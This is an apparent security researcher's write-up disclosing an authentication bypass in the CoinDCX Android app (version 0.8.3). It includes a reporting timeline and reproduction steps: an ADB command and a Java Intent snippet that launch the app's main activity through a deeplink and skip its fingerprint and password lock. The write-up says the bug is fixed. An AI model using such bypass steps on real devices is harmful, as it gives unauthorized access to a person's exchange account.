Bypass of biometrics & password security functionality for Android

Share on facebook
Share on twitter
Share on linkedin
Share on reddit
Share on email

Bypass of Biometrics & Password Security Functionality For androidReported : Sat, Feb 27, 8:52 PM — 2020
Reported Again : Mon, Nov 2, 2020, 3:12 AM
Req for an update : Sat, Nov 7, 2020, 10:02 AM
Another req for update : Wed, Nov 11, 2020, 12:20 PM
.
.
.

No response from COINDCX, then i decided to tweed and tag the authorities to reach them.
https://twitter.com/Dheerajmadhukar/status/1365683708104118277

https://twitter.com/nrjkhandelwal
https://twitter.com/smtgpt

Again nobody even care! ** BUT BUG IS FIXED **

Now you have the actual report 😉 & POCAsset:
com.coindcx (Android: Play Store)Asset Details:
Version — 0.8.3
Updated — October 27, 2020
Test Android Device Details:
Non-rootedWeakness:
Improper Authentication — GenericSummary:
CoinDCX Android App has an option to unlock the app using fingerprint and password. But if “com.coindcx.MainActivity” activity triggers with “deeplink”, authentication is no longer required.Step to Reproduce:
It is possible via ADB and Java (Android App):ADB command:
$ adb shell am start -n com.coindcx/.MainActivity -d “https://coindcx.com"Java (Android App):Intent intent = new Intent();
intent.setClassName(“com.coindcx”, “com.coindcx.MainActivity”);
intent.setData(Uri.parse(“https://coindcx.com"));
startActivity(intent);Impact:
Unauthorized access to use the application.

PoC [ Proof of Concept ]

https://medium.com/media/54485a3d5a674d5495a43f53c809b248/href

Twitter profile: @Dheerajmadhukar

LinkedIn profile: @dheerajtechnolegends

Bypass of biometrics & password security functionality for Android was originally published in InfoSec Write-ups on Medium, where people are

Read the article